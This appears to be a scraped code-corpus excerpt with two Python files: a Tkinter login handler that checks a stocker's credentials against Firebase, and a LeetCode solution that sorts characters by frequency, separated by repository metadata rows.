    top_level = None
import Stocker_Home
idno = ""
def Stocker_validation():
    """Validate the stocker's login credentials against Firebase.

    Reads the username and password from the login form (module-global
    ``w``), shows an error dialog for empty fields or a failed lookup,
    and on success closes the login window and opens the stocker home
    screen.

    Returns:
        str: the username that was entered (also stored in the module
        global ``idno`` so it remains readable after the window closes).
    """
    global idno
    idno = w.Admin_username.get()
    password = w.Admin_password.get()
    if(idno == ""):
        messagebox.showerror("Stocker Login","Please Enter Username")
    else:
        if(password == ""):
            messagebox.showerror("Stocker Login","Please Enter Password")
        else:
            # Fetch the stocker record keyed by the entered id; get()
            # returns None when no such record exists.
            fire = fb.FirebaseApplication("https://python-project-2d5d6.firebaseio.com/merchant/employee/stocker",None)
            result = fire.get("stocker", idno)
            if result != None:
                # NOTE(review): the password is stored and compared in
                # plain text — it should be hashed; confirm with the
                # data owner before changing the stored format.
                if result["password"] == password:
                    destroy_window()
                    Stocker_Home.vp_start_gui()
                else:
                    messagebox.showerror("stocker login","Invalid Password")
            else:
                messagebox.showerror("stocker login","Invalid Idno")
    return idno
def Stocker_Cancel():
    # Cancel-button handler: close the login window without logging in.
    destroy_window()
| [
"123deshmukhshweta@gmail.com"
] | 123deshmukhshweta@gmail.com |
95b1b870a5d43d004cda91f86fbfa2c7bf12bd8c | 9dee94907e6456a4af9855d358693923c17b4e0d | /0451_Sort_Characters_By_Frequency.py | 92254fbc5d08ee4386acef0c4237627f0dffc781 | [] | no_license | chien-wei/LeetCode | e215915a8103e56f182040dacc9fb0d6996c86ec | 0d6f414e7610fedb2ec4818ecf88d51aa69e1355 | refs/heads/master | 2021-05-13T14:48:22.891100 | 2019-08-20T05:52:59 | 2019-08-20T05:52:59 | 116,749,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | class Solution:
def frequencySort(self, s):
"""
:type s: str
:rtype: str
"""
res = ""
print(collections.Counter(s))
for c, i in collections.Counter(s).most_common():
res += c*i
return res | [
"chien-wei@outlook.com"
] | chien-wei@outlook.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.